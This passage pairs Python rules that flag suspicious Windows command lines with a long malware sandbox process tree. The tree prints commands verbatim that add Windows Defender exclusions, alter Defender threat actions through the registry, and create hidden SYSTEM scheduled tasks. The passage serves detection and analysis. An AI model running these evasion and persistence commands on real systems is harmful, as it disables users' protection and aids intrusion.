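        out.append(("cmd reads its script from a redirected file", {"file": m["src"]}))
    if m := FINDSTR.search(cmdline):
        hit = {p.lower() for p in m["pats"].split()} & AV_IMAGES
        if hit:
            out.append(("security product discovery via findstr", {"images": hit}))
    if m := COPY_B.search(cmdline):
        parts = [p.strip() for p in m["parts"].split("+")]
        if len(parts) > 1:  # a single-source copy /b is not interesting
            out.append(("binary reassembled from fragments with copy /b", {
                "fragments": parts, "dst": m["dst"],
                "executable_dst": m["dst"].lower().endswith(EXEC_EXT)}))
    if m := DELAY.search(cmdline):
        via = "ping" if m["n"] else "timeout"
        out.append(("execution delay", {"via": via, "n": int(m["n"] or m["t"])}))
    if SCHTASKS.search(cmdline):
        tr = re.search(r"/tr\s+(?P<tr>.+)$", cmdline, re.I)
        detail = {"schedule": _opt(cmdline, "/sc"), "runlevel": _opt(cmdline, "/rl"),
                  "action": tr["tr"] if tr else None, "reasons": []}
        if detail["schedule"] == "onlogon":
            detail["reasons"].append("runs at every logon")
        if detail["runlevel"] == "highest":
            detail["reasons"].append("requests highest run level")
        if detail["action"] and USER_WRITABLE.search(detail["action"]):
            detail["reasons"].append("action binary lives in a user-writable path")
        out.append(("scheduled task persistence", detail))
    return out


def triage(cmdlines):
    """Run every rule over every command line; returns a flat list of findings."""
    return [(cl, tech, detail) for cl in cmdlines for tech, detail in analyze(cl)]


# Constructed input: the command lines from the report's process tree.
SAMPLE_CMDLINES = [
    '"C:\\Windows\\System32\\cmd.exe" /k cmd < Tunisia & exit',
    'tasklist',
    'findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"',
    'findstr /I "wrsa.exe"',
    'cmd /c mkdir 18721',
    'cmd /c copy /b Cock + Enhance + Forest + Grocery + Mall 18721\\Fighting.pif',
    'cmd /c copy /b Amd + Backed 18721\\Q',
    '18721\\Fighting.pif 18721\\Q',
    'ping -n 5 localhost',
    'schtasks /create /f /sc onlogon /rl highest /tn "svchos" /tr \'"C:\\Users\\Admin\\AppData\\Roaming\\svchos.exe"\'',
    'timeout 3',
    'C:\\Windows\\system32\\cmd.exe /c ""C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp3A.tmp.bat""',
]

if __name__ == "__main__":
    for cl, tech, detail in triage(SAMPLE_CMDLINES):
        print(f"[{tech}] {cl}\n    {detail}")
```

Eight of the twelve sample lines produce a finding. The same rules map onto Sysmon event 1 or 4688 CommandLine fields unchanged; the point of keeping each rule a single regex plus a small post-check is that the post-check (fragment count, AV intersection, run level, writable path) is where the false positives are removed, not the regex.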

[3] C:\Users\Admin\AppData\Local\Temp\a\rem.exe
    "C:\Users\Admin\AppData\Local\Temp\a\rem.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory

[4] C:\Users\Admin\AppData\Roaming\microsofts\svcs.exe
    "C:\Users\Admin\AppData\Roaming\microsofts\svcs.exe"
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetWindowsHookEx

[3] C:\Users\Admin\AppData\Local\Temp\a\rooma.exe
    "C:\Users\Admin\AppData\Local\Temp\a\rooma.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

[3] C:\Users\Admin\AppData\Local\Temp\a\regasms.exe
    "C:\Users\Admin\AppData\Local\Temp\a\regasms.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx

[3] C:\Users\Admin\AppData\Local\Temp\a\Zinck2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Zinck2.exe"
    - Executes dropped EXE

[4] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 576
    - Program crash

[4] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2676 -s 588
    - Program crash

[3] C:\Users\Admin\AppData\Local\Temp\a\Zinckeds.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Zinckeds.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

[4] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4948 -s 260
    - Program crash

[3] C:\Windows\SysWOW64\netbtugc.exe
    "C:\Windows\SysWOW64\netbtugc.exe"
    - Suspicious use of SetThreadContext
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection

[4] C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"

[3] C:\Users\Admin\AppData\Local\Temp\a\go.exe
    "C:\Users\Admin\AppData\Local\Temp\a\go.exe"
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video

[4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

[3] C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
    "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken

[3] C:\Users\Admin\AppData\Local\Temp\a\aaaaaaaa.exe
    "C:\Users\Admin\AppData\Local\Temp\a\aaaaaaaa.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    - Suspicious use of AdjustPrivilegeToken

[3] C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v15.exe
    "C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v15.exe"
    - Modifies firewall policy service
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[3] C:\Users\Admin\AppData\Local\Temp\a\server.exe
    "C:\Users\Admin\AppData\Local\Temp\a\server.exe"
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of SetWindowsHookEx

[3] C:\Users\Admin\AppData\Local\Temp\a\wxijgyp.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wxijgyp.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wxijgyp.exe"
    - Suspicious use of AdjustPrivilegeToken

[3] C:\Users\Admin\AppData\Local\Temp\a\time2time.exe
    "C:\Users\Admin\AppData\Local\Temp\a\time2time.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[4] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath $env:UserProfile
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken

[5] C:\Users\Admin\Pictures\an4IhMEUJGaXcuvcgGd8PX9U.exe
    "C:\Users\Admin\Pictures\an4IhMEUJGaXcuvcgGd8PX9U.exe" /s
    - Executes dropped EXE
    - Loads dropped DLL
    - Writes to the Master Boot Record (MBR)
    - Suspicious use of AdjustPrivilegeToken
C:\Users\Admin\Pictures\360TS_Setup.exe"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=6⤵
C:\Program Files (x86)\1716744628_0\360TS_Setup.exe"C:\Program Files (x86)\1716744628_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall7⤵

[5] C:\Users\Admin\Pictures\oiktbrfhNygCPSFVdJ1Rkgku.exe
    "C:\Users\Admin\Pictures\oiktbrfhNygCPSFVdJ1Rkgku.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[5] C:\Users\Admin\Pictures\i4NmxEpmuAkauKUZZPpG91uN.exe
    "C:\Users\Admin\Pictures\i4NmxEpmuAkauKUZZPpG91uN.exe"
    - Executes dropped EXE

[6] C:\Users\Admin\AppData\Local\Temp\7zS782F.tmp\Install.exe
    .\Install.exe /odidum "385118" /S
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Enumerates system info in registry

[7] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

[9] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[10] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

[9] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[10] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

[9] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[10] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

[9] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[10] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[9] C:\Windows\SysWOW64\cmd.exe
    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force

[10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell start-process -WindowStyle Hidden gpupdate.exe /force
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken

[11] C:\Windows\SysWOW64\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force

[7] C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

[8] C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

[9] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken

[10] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
    - Suspicious use of AdjustPrivilegeToken

[7] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS782F.tmp\Install.exe\" it /giAdidFZjj 385118 /S" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)

[7] C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"

[8] C:\Windows\SysWOW64\cmd.exe
    /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

[9] \??\c:\windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

[3] C:\Users\Admin\AppData\Local\Temp\a\file300un.exe
    "C:\Users\Admin\AppData\Local\Temp\a\file300un.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken

[5] C:\Users\Admin\Pictures\AIrj5QVEYuGuBGBtXUl948x8.exe
    "C:\Users\Admin\Pictures\AIrj5QVEYuGuBGBtXUl948x8.exe"
    - Executes dropped EXE
    - Checks SCSI registry key(s)

[6] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6428 -s 352
    - Program crash

[5] C:\Users\Admin\Pictures\dheliGO8vZJZX17tAGdW1JAq.exe
    "C:\Users\Admin\Pictures\dheliGO8vZJZX17tAGdW1JAq.exe" /s
    - Executes dropped EXE

[5] C:\Users\Admin\Pictures\nO20MXBUGloxh9agdli788Vc.exe
    "C:\Users\Admin\Pictures\nO20MXBUGloxh9agdli788Vc.exe"
    - Modifies firewall policy service
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[5] C:\Users\Admin\Pictures\eZLzlDEi6dGI8UUD1hmA2jyZ.exe
    "C:\Users\Admin\Pictures\eZLzlDEi6dGI8UUD1hmA2jyZ.exe"
    - Executes dropped EXE

[6] C:\Users\Admin\AppData\Local\Temp\7zS9B18.tmp\Install.exe
    .\Install.exe /odidum "385118" /S
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Enumerates system info in registry

[7] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

[9] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[10] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

[9] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[10] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

[9] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[10] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

[9] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[10] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[8] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[9] C:\Windows\SysWOW64\cmd.exe
    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force

[10] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell start-process -WindowStyle Hidden gpupdate.exe /force
    - Command and Scripting Interpreter: PowerShell

[11] C:\Windows\SysWOW64\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force

[7] C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

[8] C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

[9] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
    - Command and Scripting Interpreter: PowerShell

[10] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

[7] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 17:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9B18.tmp\Install.exe\" it /LKCdidakqp 385118 /S" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)

[7] C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"

[8] C:\Windows\SysWOW64\cmd.exe
    /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

[9] \??\c:\windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ

[3] C:\Users\Admin\AppData\Local\Temp\a\zwuivg.exe
    "C:\Users\Admin\AppData\Local\Temp\a\zwuivg.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\zwuivg.exe"
    - Suspicious use of AdjustPrivilegeToken

[4] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5680 -s 704
    - Program crash

[3] C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe
    "C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[3] C:\Users\Admin\AppData\Local\Temp\a\rtx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\rtx.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[4] C:\Users\Admin\AppData\Local\Temp\a\rtx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\rtx.exe"
    - Executes dropped EXE
    - Adds Run key to start application

[3] C:\Users\Admin\AppData\Local\Temp\a\example.exe
    "C:\Users\Admin\AppData\Local\Temp\a\example.exe"
    - Executes dropped EXE

[3] C:\Users\Admin\AppData\Local\Temp\a\win-test.exe
    "C:\Users\Admin\AppData\Local\Temp\a\win-test.exe"
    - Executes dropped EXE

[3] C:\Users\Admin\AppData\Local\Temp\a\backdoor.exe
    "C:\Users\Admin\AppData\Local\Temp\a\backdoor.exe"
    - Executes dropped EXE

[3] C:\Users\Admin\AppData\Local\Temp\a\asdf.exe
    "C:\Users\Admin\AppData\Local\Temp\a\asdf.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

[3] C:\Users\Admin\AppData\Local\Temp\a\wsiopohwqsd.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wsiopohwqsd.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\wsiopohwqsd.exe"

[4] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6360 -s 704
    - Program crash

[3] C:\Users\Admin\AppData\Local\Temp\a\QEwecfyhj.exe
    "C:\Users\Admin\AppData\Local\Temp\a\QEwecfyhj.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage

[4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Users\Admin\AppData\Local\Temp\a\QEwecfyhj.exe"

[3] C:\Users\Admin\AppData\Local\Temp\a\Bypass3_Pure_Mode.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Bypass3_Pure_Mode.exe"
    - Checks computer location settings
    - Executes dropped EXE

[4] C:\Users\Admin\example.exe
    "C:\Users\Admin\example.exe"
    - Executes dropped EXE

[5] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\example.exe" MD5 | find /i /v "md5" | find /i /v "certutil"

[6] C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\example.exe" MD5

[6] C:\Windows\system32\find.exe
    find /i /v "md5"

[6] C:\Windows\system32\find.exe
    find /i /v "certutil"

[5] C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c start cmd /C "color b && title Error && echo Signature checksum failed. Request was tampered with or session ended most likely. & echo: & echo Message: Session not found. Use latest code. You can only have app opened 1 at a time. && timeout /t 5"

[4] C:\Users\Admin\XClient.exe
    "C:\Users\Admin\XClient.exe"
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx

[5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClient.exe'
    - Command and Scripting Interpreter: PowerShell

[5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
    - Command and Scripting Interpreter: PowerShell

[6] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\csrss.exe'
